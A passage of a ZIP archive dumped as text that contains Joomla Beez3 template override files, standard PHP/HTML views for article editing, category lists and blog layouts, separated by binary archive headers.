					<?php echo $this->form->getInput('urla', 'urls'); ?>
				</div>
			</div>
			<div class="control-group">
				<div class="control-label">
					<?php echo $this->form->getLabel('urlatext', 'urls'); ?>
				</div>
				<div class="controls">
					<?php echo $this->form->getInput('urlatext', 'urls'); ?>
				</div>
			</div>
			<div class="control-group">
				<div class="controls">
					<?php echo $this->form->getInput('targeta', 'urls'); ?>
				</div>
			</div>
			<div class="control-group">
				<div class="control-label">
					<?php echo $this->form->getLabel('urlb', 'urls'); ?>
				</div>
				<div class="controls">
					<?php echo $this->form->getInput('urlb', 'urls'); ?>
				</div>
			</div>
			<div class="control-group">
				<div class="control-label">
					<?php echo $this->form->getLabel('urlbtext', 'urls'); ?>
				</div>
				<div class="controls">
					<?php echo $this->form->getInput('urlbtext', 'urls'); ?>
				</div>
			</div>
			<div class="control-group">
				<div class="controls">
					<?php echo $this->form->getInput('targetb', 'urls'); ?>
				</div>
			</div>
			<div class="control-group">
				<div class="control-label">
					<?php echo $this->form->getLabel('urlc', 'urls'); ?>
				</div>
				<div class="controls">
					<?php echo $this->form->getInput('urlc', 'urls'); ?>
				</div>
			</div>
			<div class="control-group">
				<div class="control-label">
					<?php echo $this->form->getLabel('urlctext', 'urls'); ?>
				</div>
				<div class="controls">
					<?php echo $this->form->getInput('urlctext', 'urls'); ?>
				</div>
			</div>
			<div class="control-group">
				<div class="controls">
					<?php echo $this->form->getInput('targetc', 'urls'); ?>
				</div>
			</div>
	</fieldset>
	<?php endif; ?>

	<?php // Render additional fieldsets added by plugins. ?>
	<?php foreach ($this->form->getFieldsets() as $fieldset) : ?>
		<?php if (in_array($fieldset->name, $ignoredFieldsets)) : ?>
			<?php continue; ?>
		<?php endif; ?>
		<fieldset>
			<legend><?php echo JText::_($fieldset->label); ?></legend>
			<?php $this->fieldset = $fieldset->name; ?>
			<?php echo JLayoutHelper::render('joomla.edit.fieldset', $this); ?>
		</fieldset>
	<?php endforeach; ?>

	<fieldset>
		<legend><?php echo JText::_('COM_CONTENT_PUBLISHING'); ?></legend>
			<div class="control-group">
				<div class="control-label">
					<?php echo $this->form->getLabel('catid'); ?>
				</div>
				<div class="controls">
					<?php echo $this->form->getInput('catid'); ?>
				</div>
			</div>
			<div class="control-group">
				<div class="control-label">
					<?php echo $this->form->getLabel('tags'); ?>
				</div>
				<div class="controls">
					<?php echo $this->form->getInput('tags'); ?>
				</div>
			</div>
			<div class="control-group">
				<div class="control-label">
					<?php echo $this->form->getLabel('note'); ?>
				</div>
				<div class="controls">
					<?php echo $this->form->getInput('note'); ?>
				</div>
			</div>
			<?php if ($params->get('save_history', 0)) : ?>
				<div class="control-label">
					<?php echo $this->form->getLabel('version_note'); ?>
				</div>
				<div class="controls">
					<?php echo $this->form->getInput('version_note'); ?>
				</div>
			<?php endif; ?>
			<?php if ($params->get('show_publishing_options', 1) == 1) : ?>
			<div class="control-group">
				<div class="control-label">
					<?php echo $this->form->getLabel('created_by_alias'); ?>
				</div>
				<div class="controls">
					<?php echo $this->form->getInput('created_by_alias'); ?>
				</div>
			</div>
			<?php endif; ?>
			<?php if ($this->item->params->get('access-change')) : ?>
				<div class="control-group">
					<div class="control-label">
						<?php echo $this->form->getLabel('state'); ?>
					</div>
					<div class="controls">
						<?php echo $this->form->getInput('state'); ?>
					</div>
				</div>
				<div class="control-group">
					<div class="control-label">
						<?php echo $this->form->getLabel('featured'); ?>
					</div>
					<div class="controls">
						<?php echo $this->form->getInput('featured'); ?>
					</div>
				</div>
				<?php if ($params->get('show_publishing_options', 1) == 1) : ?>
				<div class="control-group">
					<div class="control-label">
						<?php echo $this->form->getLabel('publish_up'); ?>
					</div>
					<div class="controls">
						<?php echo $this->form->getInput('publish_up'); ?>
					</div>
				</div>
				<div class="control-group">
					<div class="control-label">
						<?php echo $this->form->getLabel('publish_down'); ?>
					</div>
					<div class="controls">
						<?php echo $this->form->getInput('publish_down'); ?>
					</div>
				</div>
				<?php endif; ?>
			<?php endif; ?>
			<div class="control-group">
				<div class="control-label">
					<?php echo $this->form->getLabel('access'); ?>
				</div>
				<div class="controls">
					<?php echo $this->form->getInput('access'); ?>
				</div>
			</div>
			<?php if ($this->item->id === null):?>
				<div class="control-group">
					<div class="control-label">
					</div>
					<div class="controls">
						<?php echo JText::_('COM_CONTENT_ORDERING'); ?>
					</div>
				</div>
			<?php endif; ?>
	</fieldset>

	<fieldset>
		<legend><?php echo JText::_('JFIELD_LANGUAGE_LABEL'); ?></legend>
			<div class="control-group">
				<div class="control-label">
					<?php echo $this->form->getLabel('language'); ?>
				</div>
				<div class="controls">
					<?php echo $this->form->getInput('language'); ?>
				</div>
			</div>
	</fieldset>

	<?php if ($params->get('show_publishing_options', 1) == 1) : ?>
	<fieldset>
		<legend><?php echo JText::_('COM_CONTENT_METADATA'); ?></legend>
			<div class="control-group">
				<div class="control-label">
					<?php echo $this->form->getLabel('metadesc'); ?>
				</div>
				<div class="controls">
					<?php echo $this->form->getInput('metadesc'); ?>
				</div>
			</div>
			<div class="control-group">
				<div class="control-label">
					<?php echo $this->form->getLabel('metakey'); ?>
				</div>
				<div class="controls">
					<?php echo $this->form->getInput('metakey'); ?>
				</div>
			</div>
	</fieldset>
	<?php endif; ?>
		<input type="hidden" name="task" value="" />
		<input type="hidden" name="return" value="<?php echo $this->return_page;?>" />
		<?php if ($this->params->get('enable_category', 0) == 1) : ?>
			<input type="hidden" name="jform[catid]" value="<?php echo $this->params->get('catid', 1);?>"/>
		<?php endif;?>
		<?php echo JHtml::_('form.token'); ?>

</form>
</div>
PK!�-�,	,	4beez3/html/com_content/category/default_children.phpnu&1i�<?php
/**
 * @package     Joomla.Site
 * @subpackage  Templates.beez3
 *
 * @copyright   Copyright (C) 2005 - 2020 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

$app = JFactory::getApplication();
$templateparams = $app->getTemplate(true)->params;

$class  = ' class="first"';
$user   = JFactory::getUser();
$groups = $user->getAuthorisedViewLevels();
?>

<?php if (count($this->children[$this->category->id]) > 0) :?>

	<ul>
	<?php foreach ($this->children[$this->category->id] as $id => $child) : ?>
		<?php // Check whether category access level allows access to subcategories. ?>
		<?php if (in_array($child->access, $groups)) : ?>
			<?php
			if ($this->params->get('show_empty_categories') || $child->getNumItems(true) || count($child->getChildren())) :
				if (!isset($this->children[$this->category->id][$id + 1])) :
					$class = ' class="last"';
				endif;
			?>
				<li<?php echo $class; ?>>
				<?php $class = ''; ?>
					<h3 class="item-title"><a href="<?php echo JRoute::_(ContentHelperRoute::getCategoryRoute($child->id));?>">
						<?php echo $this->escape($child->title); ?></a>
					</h3>
					<?php if ($this->params->get('show_subcat_desc') == 1) :?>
						<?php if ($child->description and $this->params->get('show_description') != 0 ) : ?>
							<div class="category-desc">
								<?php echo JHtml::_('content.prepare', $child->description, '', 'com_content.category'); ?>
							</div>
						<?php endif; ?>
					<?php endif; ?>

					<?php if ($this->params->get('show_cat_num_articles', 1)) : ?>
						<?php if ($child->getNumItems() == true) : ?>
						<dl>
							<dt>
								<?php echo JText::_('COM_CONTENT_NUM_ITEMS'); ?>
							</dt>
							<dd>
								<?php echo $child->getNumItems(true); ?>
							</dd>
						</dl>
						<?php endif; ?>
					<?php endif; ?>

					<?php if (count($child->getChildren()) > 0 ) :
						$this->children[$child->id] = $child->getChildren();
						$this->category = $child;
						$this->maxLevel--;
						if ($this->maxLevel !== 0) :
							echo $this->loadTemplate('children');
						endif;
						$this->category = $child->getParent();
						$this->maxLevel++;
					endif; ?>
				</li>
			<?php endif; ?>
		<?php endif; ?>
	<?php endforeach; ?>
	</ul>

<?php endif; ?>
PK!�Jl��"�"4beez3/html/com_content/category/default_articles.phpnu&1i�<?php
/**
 * @package     Joomla.Site
 * @subpackage  Templates.beez3
 *
 * @copyright   Copyright (C) 2005 - 2020 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

$app = JFactory::getApplication();

JHtml::addIncludePath(JPATH_COMPONENT.'/helpers/html');
JHtml::_('behavior.framework');

$n         = count($this->items);
$listOrder = $this->escape($this->state->get('list.ordering'));
$listDirn  = $this->escape($this->state->get('list.direction'));

// Check for at least one editable article
$isEditable = false;

if (!empty($this->items))
{
	foreach ($this->items as $article)
	{
		if ($article->params->get('access-edit'))
		{
			$isEditable = true;
			break;
		}
	}
}
?>

<?php if (empty($this->items)) : ?>

	<?php if ($this->params->get('show_no_articles', 1)) : ?>
		<p><?php echo JText::_('COM_CONTENT_NO_ARTICLES'); ?></p>
	<?php endif; ?>

<?php else : ?>

<form action="<?php echo htmlspecialchars(JUri::getInstance()->toString()); ?>" method="post" name="adminForm" id="adminForm">
	<?php if ($this->params->get('filter_field') !== 'hide') : ?>
	<fieldset class="filters">
		<legend class="hidelabeltxt">
			<?php echo JText::_('JGLOBAL_FILTER_LABEL'); ?>
		</legend>
		<div class="filter-search">
			<?php if ($this->params->get('filter_field') === 'tag') :?>
			<select name="filter_tag" id="filter_tag" onchange="document.adminForm.submit();">
				<option value=""><?php echo JText::_('JOPTION_SELECT_TAG'); ?></option>
				<?php echo JHtml::_('select.options', JHtml::_('tag.options', true, true), 'value', 'text', $this->state->get('filter.tag')); ?>
			</select>
			<?php elseif ($this->params->get('filter_field') === 'month') : ?>
			<select name="filter-search" id="filter-search" onchange="document.adminForm.submit();">
				<option value=""><?php echo JText::_('JOPTION_SELECT_MONTH'); ?></option>
				<?php echo JHtml::_('select.options', JHtml::_('content.months', $this->state), 'value', 'text', $this->state->get('list.filter')); ?>
			</select>
			<?php else : ?>		
			<label class="filter-search-lbl element-invisible" for="filter-search">
				<?php echo JText::_('COM_CONTENT_'.$this->params->get('filter_field').'_FILTER_LABEL').'&#160;'; ?>
			</label>
			<input type="text" name="filter-search" id="filter-search" value="<?php echo $this->escape($this->state->get('list.filter')); ?>" class="inputbox" onchange="document.adminForm.submit();" title="<?php echo JText::_('COM_CONTENT_FILTER_SEARCH_DESC'); ?>" placeholder="<?php echo JText::_('COM_CONTENT_'.$this->params->get('filter_field').'_FILTER_LABEL'); ?>" />
			<?php endif; ?>
		</div>
	<?php endif; ?>

	<?php if ($this->params->get('show_pagination_limit')) : ?>
		<div class="display-limit">
			<?php echo JText::_('JGLOBAL_DISPLAY_NUM'); ?>&#160;
			<?php echo $this->pagination->getLimitBox(); ?>
		</div>
	<?php endif; ?>

	<?php if ($this->params->get('filter_field') !== 'hide') :?>
	</fieldset>
	<?php endif; ?>

	<div class="clr"></div>

	<table class="category">
		<?php if ($this->params->get('show_headings')) : ?>
		<thead>
			<tr>
				<th class="list-title" id="tableOrdering">
					<?php echo JHtml::_('grid.sort', 'COM_CONTENT_HEADING_TITLE', 'a.title', $listDirn, $listOrder); ?>
				</th>

				<?php if ($date = $this->params->get('list_show_date')) : ?>
				<th class="list-date" id="tableOrdering2">
					<?php if ($date === 'created') : ?>
						<?php echo JHtml::_('grid.sort', 'COM_CONTENT_'.$date.'_DATE', 'a.created', $listDirn, $listOrder); ?>
					<?php elseif ($date === 'modified') : ?>
						<?php echo JHtml::_('grid.sort', 'COM_CONTENT_'.$date.'_DATE', 'a.modified', $listDirn, $listOrder); ?>
					<?php elseif ($date === 'published') : ?>
						<?php echo JHtml::_('grid.sort', 'COM_CONTENT_'.$date.'_DATE', 'a.publish_up', $listDirn, $listOrder); ?>
					<?php endif; ?>
				</th>
				<?php endif; ?>

				<?php if ($this->params->get('list_show_author', 1)) : ?>
				<th class="list-author" id="tableOrdering3">
					<?php echo JHtml::_('grid.sort', 'JAUTHOR', 'author', $listDirn, $listOrder); ?>
				</th>
				<?php endif; ?>

				<?php if ($this->params->get('list_show_hits', 1)) : ?>
				<th class="list-hits" id="tableOrdering4">
					<?php echo JHtml::_('grid.sort', 'JGLOBAL_HITS', 'a.hits', $listDirn, $listOrder); ?>
				</th>
				<?php endif; ?>
				<?php if ($this->params->get('list_show_votes', 0) && $this->vote) : ?>
					<th id="categorylist_header_votes">
						<?php echo JHtml::_('grid.sort', 'COM_CONTENT_VOTES', 'rating_count', $listDirn, $listOrder); ?>
					</th>
				<?php endif; ?>
				<?php if ($this->params->get('list_show_ratings', 0) && $this->vote) : ?>
					<th id="categorylist_header_ratings">
						<?php echo JHtml::_('grid.sort', 'COM_CONTENT_RATINGS', 'rating', $listDirn, $listOrder); ?>
					</th>
				<?php endif; ?>
				<?php if ($isEditable) : ?>
					<th id="categorylist_header_edit"><?php echo JText::_('COM_CONTENT_EDIT_ITEM'); ?></th>
				<?php endif; ?>
			</tr>
		</thead>
		<?php endif; ?>

		<tbody>

			<?php foreach ($this->items as $i => &$article) : ?>
			<tr class="cat-list-row<?php echo $i % 2; ?>">

				<?php if (in_array($article->access, $this->user->getAuthorisedViewLevels())) : ?>

					<td class="list-title">
						<a href="<?php echo JRoute::_(ContentHelperRoute::getArticleRoute($article->slug, $article->catid, $article->language)); ?>">
							<?php echo $this->escape($article->title); ?></a>
					</td>

					<?php if ($this->params->get('list_show_date')) : ?>
					<td class="list-date">
						<?php
							echo JHtml::_(
									'date', $article->displayDate, $this->escape(
											$this->params->get('date_format', JText::_('DATE_FORMAT_LC3'))
									)
							);
						?>
					</td>
					<?php endif; ?>

					<?php if ($this->params->get('list_show_author', 1)) : ?>
					<td class="list-author">
						<?php if (!empty($article->author) || !empty($article->created_by_alias)) : ?>
							<?php $author = $article->created_by_alias ?: $article->author; ?>
							<?php if (!empty($article->contact_link) && $this->params->get('link_author') == true):?>
								<?php echo JText::sprintf('COM_CONTENT_WRITTEN_BY', JHtml::_('link', $article->contact_link, $author)); ?>
							<?php else :?>
								<?php echo JText::sprintf('COM_CONTENT_WRITTEN_BY', $author); ?>
							<?php endif; ?>
						<?php endif; ?>
					</td>
					<?php endif; ?>

					<?php if ($this->params->get('list_show_hits', 1)) : ?>
					<td class="list-hits">
						<?php echo $article->hits; ?>
					</td>
					<?php endif; ?>

					<?php if ($this->params->get('list_show_votes', 0) && $this->vote) : ?>
						<td class="list-votes">
							<?php echo $article->rating_count; ?>
						</td>
					<?php endif; ?>
					<?php if ($this->params->get('list_show_ratings', 0) && $this->vote) : ?>
						<td class="list-ratings">
							<?php echo $article->rating; ?>
						</td>
					<?php endif; ?>
					<?php if ($isEditable) : ?>
						<td class="list-edit">
							<?php if ($article->params->get('access-edit')) : ?>
								<?php echo JHtml::_('icon.edit', $article, $article->params, array(), true); ?>
							<?php endif; ?>
						</td>
					<?php endif; ?>
				<?php else : ?>
				<td>
					<?php
						echo $this->escape($article->title).' : ';
						$menu = JFactory::getApplication()->getMenu();
						$active = $menu->getActive();
						$itemId = $active->id;
						$link   = new JUri(JRoute::_('index.php?option=com_users&view=login&Itemid=' . $itemId, false));
						$link->setVar('return', base64_encode(ContentHelperRoute::getArticleRoute($article->slug, $article->catid, $article->language)));
					?>
					<a href="<?php echo $link; ?>" class="register">
					<?php echo JText::_('COM_CONTENT_REGISTER_TO_READ_MORE'); ?></a>
				</td>
				<?php endif; ?>

			</tr>
			<?php endforeach; ?>
		</tbody>
	</table>
<?php endif; ?>

<?php // Code to add a link to submit an article. ?>
<?php if ($this->category->getParams()->get('access-create')) : ?>
	<?php echo JHtml::_('icon.create', $this->category, $this->category->params, array(), true); ?>
<?php  endif; ?>

<?php // Add pagination links ?>
<?php if (!empty($this->items)) : ?>
	<?php if (($this->params->def('show_pagination', 2) == 1  || ($this->params->get('show_pagination') == 2)) && ($this->pagination->pagesTotal > 1)) : ?>
	<div class="pagination">

		<?php if ($this->params->def('show_pagination_results', 1)) : ?>
			 <p class="counter">
				<?php echo $this->pagination->getPagesCounter(); ?>
			</p>
		<?php  endif; ?>

		<?php echo $this->pagination->getPagesLinks(); ?>
	</div>
	<?php endif; ?>

	<div>
		<input type="hidden" name="task" value="" />
		<input type="hidden" name="filter_order" value="" />
		<input type="hidden" name="filter_order_Dir" value="" />
		<input type="hidden" name="limitstart" value="" />
	</div>
</form>
<?php endif; ?>
PK!n����-beez3/html/com_content/category/blog_item.phpnu&1i�<?php
/**
 * @package     Joomla.Site
 * @subpackage  Templates.beez3
 *
 * @copyright   Copyright (C) 2005 - 2020 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */
defined('_JEXEC') or die;

$params = &$this->item->params;
$images = json_decode($this->item->images);
$app = JFactory::getApplication();
$canEdit = $this->item->params->get('access-edit');

JHtml::addIncludePath(JPATH_COMPONENT . '/helpers');
?>


<?php if ($this->item->state == 0 || strtotime($this->item->publish_up) > strtotime(JFactory::getDate())
	|| (strtotime($this->item->publish_down) < strtotime(JFactory::getDate()) && $this->item->publish_down !== JFactory::getDbo()->getNullDate())) : ?>
<div class="system-unpublished">
<?php endif; ?>
<?php if ($params->get('show_title')) : ?>
	<h2>
		<?php if ($params->get('link_titles') && $params->get('access-view')) : ?>
			<a href="<?php echo JRoute::_(ContentHelperRoute::getArticleRoute($this->item->slug, $this->item->catid, $this->item->language)); ?>">
			<?php echo $this->escape($this->item->title); ?></a>
		<?php else : ?>
			<?php echo $this->escape($this->item->title); ?>
		<?php endif; ?>
	</h2>
<?php endif; ?>

<?php // Content is generated by content plugin event "onContentAfterTitle" ?>
<div class="pull-left"><?php echo $this->item->event->afterDisplayTitle; ?></div>

<?php if ($canEdit || $params->get('show_print_icon') || $params->get('show_email_icon')) : ?>
	<ul class="actions">
		<?php if ($params->get('show_print_icon')) : ?>
		<li class="print-icon">
			<?php echo JHtml::_('icon.print_popup', $this->item, $params, array(), true); ?>
		</li>
		<?php endif; ?>
		<?php if ($params->get('show_email_icon')) : ?>
		<li class="email-icon">
			<?php echo JHtml::_('icon.email', $this->item, $params, array(), true); ?>
		</li>
		<?php endif; ?>
		<?php if ($canEdit) : ?>
		<li class="edit-icon">
			<?php echo JHtml::_('icon.edit', $this->item, $params, array(), true); ?>
		</li>
		<?php endif; ?>
	</ul>
<?php endif; ?>

<?php echo $this->item->event->beforeDisplayContent; ?>

<?php // to do not that elegant would be nice to group the params ?>

<?php if ($params->get('show_author') || $params->get('show_category') || $params->get('show_create_date') || $params->get('show_modify_date') || $params->get('show_publish_date') || $params->get('show_parent_category') || $params->get('show_hits')) : ?>
	<dl class="article-info">
	<dt class="article-info-term"><?php echo JText::_('COM_CONTENT_ARTICLE_INFO'); ?></dt>
<?php endif; ?>
<?php if ($params->get('show_parent_category') && $this->item->parent_id != 1) : ?>
		<dd class="parent-category-name">
			<?php $title = $this->escape($this->item->parent_title);
				$url = '<a href="' . JRoute::_(ContentHelperRoute::getCategoryRoute($this->item->parent_id)) . '">' . $title . '</a>'; ?>
			<?php if ($params->get('link_parent_category')) : ?>
				<?php echo JText::sprintf('COM_CONTENT_PARENT', $url); ?>
				<?php else : ?>
				<?php echo JText::sprintf('COM_CONTENT_PARENT', $title); ?>
			<?php endif; ?>
		</dd>
<?php endif; ?>
<?php if ($params->get('show_category')) : ?>
		<dd class="category-name">
			<?php $title = $this->escape($this->item->category_title);
					$url = '<a href="' . JRoute::_(ContentHelperRoute::getCategoryRoute($this->item->catid)) . '">' . $title . '</a>'; ?>
			<?php if ($params->get('link_category')) : ?>
				<?php echo JText::sprintf('COM_CONTENT_CATEGORY', $url); ?>
				<?php else : ?>
				<?php echo JText::sprintf('COM_CONTENT_CATEGORY', $title); ?>
			<?php endif; ?>
		</dd>
<?php endif; ?>
<?php if ($params->get('show_create_date')) : ?>
		<dd class="create">
		<?php echo JText::sprintf('COM_CONTENT_CREATED_DATE_ON', JHtml::_('date', $this->item->created, JText::_('DATE_FORMAT_LC2'))); ?>
		</dd>
<?php endif; ?>
<?php if ($params->get('show_modify_date')) : ?>
		<dd class="modified">
		<?php echo JText::sprintf('COM_CONTENT_LAST_UPDATED', JHtml::_('date', $this->item->modified, JText::_('DATE_FORMAT_LC2'))); ?>
		</dd>
<?php endif; ?>
<?php if ($params->get('show_publish_date')) : ?>
		<dd class="published">
		<?php echo JText::sprintf('COM_CONTENT_PUBLISHED_DATE_ON', JHtml::_('date', $this->item->publish_up, JText::_('DATE_FORMAT_LC2'))); ?>
		</dd>
<?php endif; ?>
<?php if ($params->get('show_author') && !empty($this->item->author )) : ?>
	<dd class="createdby">
		<?php $author = $this->item->created_by_alias ?: $this->item->author; ?>
		<?php if (!empty($this->item->contact_link) && $params->get('link_author') == true) : ?>
			<?php echo JText::sprintf('COM_CONTENT_WRITTEN_BY', JHtml::_('link', $this->item->contact_link, $author)); ?>
		<?php else :?>
			<?php echo JText::sprintf('COM_CONTENT_WRITTEN_BY', $author); ?>
		<?php endif; ?>
	</dd>
<?php endif; ?>
<?php if ($params->get('show_hits')) : ?>
		<dd class="hits">
		<?php echo JText::sprintf('COM_CONTENT_ARTICLE_HITS', $this->item->hits); ?>
		</dd>
<?php endif; ?>
<?php if ($params->get('show_author') || $params->get('show_category') || $params->get('show_create_date') || $params->get('show_modify_date') || $params->get('show_publish_date') || $params->get('show_parent_category') || $params->get('show_hits')) :?>
	</dl>
<?php endif; ?>
<?php if (isset($images->image_intro) && !empty($images->image_intro)) : ?>
	<?php $imgfloat = empty($images->float_intro) ? $params->get('float_intro') : $images->float_intro; ?>
	<div class="img-intro-<?php echo htmlspecialchars($imgfloat); ?>">
	<img
		<?php if ($images->image_intro_caption):
			echo 'class="caption"'.' title="' . htmlspecialchars($images->image_intro_caption, ENT_COMPAT, 'UTF-8') . '"';
		endif; ?>
		src="<?php echo htmlspecialchars($images->image_intro, ENT_COMPAT, 'UTF-8'); ?>" alt="<?php echo htmlspecialchars($images->image_intro_alt, ENT_COMPAT, 'UTF-8'); ?>"/>
	</div>
<?php endif; ?>
<?php echo $this->item->introtext; ?>

<?php if ($params->get('show_readmore') && $this->item->readmore) :
	if ($params->get('access-view')) :
		$link = JRoute::_(ContentHelperRoute::getArticleRoute($this->item->slug, $this->item->catid, $this->item->language));
	else :
		$menu = JFactory::getApplication()->getMenu();
		$active = $menu->getActive();
		$itemId = $active->id;
		$link = new JUri(JRoute::_('index.php?option=com_users&view=login&Itemid=' . $itemId, false));
		$link->setVar('return', base64_encode(ContentHelperRoute::getArticleRoute($this->item->slug, $this->item->catid, $this->item->language)));
	endif;
?>
		<p class="readmore">
				<a href="<?php echo $link; ?>">
					<?php if (!$params->get('access-view')) :
						echo JText::_('COM_CONTENT_REGISTER_TO_READ_MORE');
					elseif ($readmore = $this->item->alternative_readmore) :
						echo $readmore;
						if ($params->get('show_readmore_title', 0) != 0) :
							echo JHtml::_('string.truncate', $this->item->title, $params->get('readmore_limit'));
						endif;
					elseif ($params->get('show_readmore_title', 0) == 0) :
						echo JText::sprintf('COM_CONTENT_READ_MORE_TITLE');
					else :
						echo JText::_('COM_CONTENT_READ_MORE');
						echo JHtml::_('string.truncate', $this->item->title, $params->get('readmore_limit'));
					endif; ?></a>
		</p>
<?php endif; ?>

<?php if ($this->item->state == 0 || strtotime($this->item->publish_up) > strtotime(JFactory::getDate())
	|| (strtotime($this->item->publish_down) < strtotime(JFactory::getDate()) && $this->item->publish_down !== JFactory::getDbo()->getNullDate())) : ?>
</div>
<?php endif; ?>

<div class="item-separator"></div>
<?php echo $this->item->event->afterDisplayContent; ?>
PK!~\���.beez3/html/com_content/category/blog_links.phpnu&1i�<?php
/**
 * @package     Joomla.Site
 * @subpackage  Templates.beez3
 *
 * @copyright   Copyright (C) 2005 - 2020 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

JHtml::addIncludePath(JPATH_COMPONENT . '/helpers');

?>

<div class="items-more">
	<h3><?php echo JText::_('COM_CONTENT_MORE_ARTICLES'); ?></h3>
	<ol>
	<?php foreach ($this->link_items as &$item) : ?>
		<li>
			<a href="<?php echo JRoute::_(ContentHelperRoute::getArticleRoute($item->slug, $item->catid, $item->language)); ?>">
			<?php echo $item->title; ?></a>
		</li>
	<?php endforeach; ?>
	</ol>
</div>
PK!�3�e[[+beez3/html/com_content/category/default.phpnu&1i�<?php
/**
 * @package     Joomla.Site
 * @subpackage  Templates.beez3
 *
 * @copyright   Copyright (C) 2005 - 2020 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

$app            = JFactory::getApplication();
$templateparams = $app->getTemplate(true)->params;


JHtml::addIncludePath(JPATH_COMPONENT . '/helpers');
JHtml::_('behavior.caption');

$showCategoryTitle            = $this->params->get('show_category_title') == 1;
$showCategoryHeadingTitleText = $this->params->get('show_category_heading_title_text', 1) == 1;
$pageSubHeading               = $this->params->get('page_subheading');
?>
<section class="category-list<?php echo $this->pageclass_sfx;?>">
<?php
if ($showPageHeading = $this->params->get('show_page_heading')) : ?>
<?php if ($showPageHeading and ($showCategoryTitle === true or $pageSubHeading)) : ?>
<hgroup>
<?php endif; ?>
<h1>
	<?php echo $this->escape($this->params->get('page_heading')); ?>
</h1>
<?php endif; ?>

<?php if ($showCategoryTitle === true or $pageSubHeading) : ?>
<h2>
	<?php echo $this->escape($pageSubHeading); ?>
	<?php if ($showCategoryTitle === true)
	{
		echo '<span class="subheading-category">'.JHtml::_('content.prepare', $this->category->title, '', 'com_content.category.title').'</span>';
	}
	?>
</h2>
<?php if ($this->params->get('show_page_heading') and ($this->params->get('show_category_title', 1) or $pageSubHeading)) : ?>
</hgroup>
<?php endif; ?>
<?php endif; ?>

<?php if ($this->params->get('show_description', 1) || $this->params->def('show_description_image', 1)) : ?>
	<div class="category-desc">
	<?php if ($this->params->get('show_description_image') && $this->category->getParams()->get('image')) : ?>
		<img src="<?php echo $this->category->getParams()->get('image'); ?>"/>
	<?php endif; ?>
	<?php if ($this->category->description && $this->params->get('show_description')) : ?>
		<?php echo JHtml::_('content.prepare', $this->category->description, '', 'com_content.category'); ?>
	<?php endif; ?>
	<div class="clr"></div>
	</div>
<?php endif; ?>

<?php if ($this->params->get('maxLevel') != 0 && is_array($this->children[$this->category->id]) && count($this->children[$this->category->id]) > 0) : ?>
	<div class="cat-children">

	<?php if ($showCategoryTitle === true or $pageSubHeading)
	{
		echo '<h3>';
	}
	elseif ($showCategoryHeadingTitleText === true)
	{
		echo '<h2>';
	} ?>
	<?php if ($showCategoryHeadingTitleText === true) : ?>
		<?php echo JText::_('JGLOBAL_SUBCATEGORIES'); ?>
	<?php endif; ?>
	<?php if ($showCategoryTitle === true or $pageSubHeading)
	{
		echo '</h3>';
	}
	elseif ($showCategoryHeadingTitleText === true)
	{
		echo '</h2>';
	} ?>
	</div>
	<?php endif; ?>
	<?php echo $this->loadTemplate('children'); ?>
	<div class="cat-items">
		<?php echo $this->loadTemplate('articles'); ?>
	</div>
</section>
PK!^t�!!(beez3/html/com_content/category/blog.phpnu&1i�<?php
/**
 * @package     Joomla.Site
 * @subpackage  Templates.beez3
 *
 * @copyright   Copyright (C) 2005 - 2020 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

$app = JFactory::getApplication();
$templateparams = $app->getTemplate(true)->params;

JHtml::addIncludePath(JPATH_COMPONENT . '/helpers');
JHtml::_('behavior.caption');

$cparams = JComponentHelper::getParams('com_media');

// If the page class is defined, add to class as suffix.
// It will be a separate class if the user starts it with a space
?>
<section class="blog<?php echo $this->pageclass_sfx;?>">
<?php if ($this->params->get('show_page_heading') != 0) : ?>
<h1>
	<?php echo $this->escape($this->params->get('page_heading')); ?>
</h1>
<?php endif; ?>

<?php if ($this->params->get('show_category_title')) : ?>
<h2 class="subheading-category">
	<?php echo JHtml::_('content.prepare', $this->category->title, '', 'com_content.category.title'); ?>
</h2>
<?php endif; ?>

<?php if ($this->params->get('show_description', 1) || $this->params->def('show_description_image', 1)) : ?>
	<div class="category-desc">
	<?php if ($this->params->get('show_description_image') && $this->category->getParams()->get('image')) : ?>
		<img src="<?php echo $this->category->getParams()->get('image'); ?>"/>
	<?php endif; ?>
	<?php if ($this->category->description && $this->params->get('show_description')) : ?>
		<?php echo JHtml::_('content.prepare', $this->category->description, '', 'com_content.category'); ?>
	<?php endif; ?>
	<div class="clr"></div>
	</div>
<?php endif; ?>

<?php if (empty($this->lead_items) && empty($this->link_items) && empty($this->intro_items)) : ?>
	<?php if ($this->params->get('show_no_articles', 1)) : ?>
		<p><?php echo JText::_('COM_CONTENT_NO_ARTICLES'); ?></p>
	<?php endif; ?>
<?php endif; ?>

<?php $leadingcount = 0; ?>
<?php if (!empty($this->lead_items)) : ?>
<div class="items-leading">
	<?php foreach ($this->lead_items as &$item) : ?>
		<article class="leading-<?php echo $leadingcount; ?><?php echo $item->state == 0 ? 'system-unpublished' : null; ?>">
			<?php
				$this->item = &$item;
				echo $this->loadTemplate('item');
			?>
		</article>
		<?php $leadingcount++; ?>
	<?php endforeach; ?>
</div>
<?php endif; ?>
<?php if (!empty($this->intro_items)) : ?>
	<?php $introcount = count($this->intro_items); ?>
	<?php $counter = 0; ?>
	<?php foreach ($this->intro_items as $key => &$item) : ?>
		<?php $rowcount = ((int) $key % (int) $this->columns) + 1; ?>
		<?php if ($rowcount === 1) : ?>
			<?php $row = $counter / $this->columns; ?>
			<div class="items-row cols-<?php echo (int) $this->columns;?> <?php echo 'row-'.$row; ?>">
		<?php endif; ?>
		<article class="item column-<?php echo $rowcount;?><?php echo $item->state == 0 ? ' system-unpublished' : null; ?>">
		<?php
			$this->item = &$item;
			echo $this->loadTemplate('item');
		?>
		</article>
		<?php $counter++; ?>
		<?php if ($rowcount === (int) $this->columns or $counter === $introcount) : ?>
			<span class="row-separator"></span>
			</div>
		<?php endif; ?>
	<?php endforeach; ?>

<?php endif; ?>

<?php if (!empty($this->link_items)) : ?>
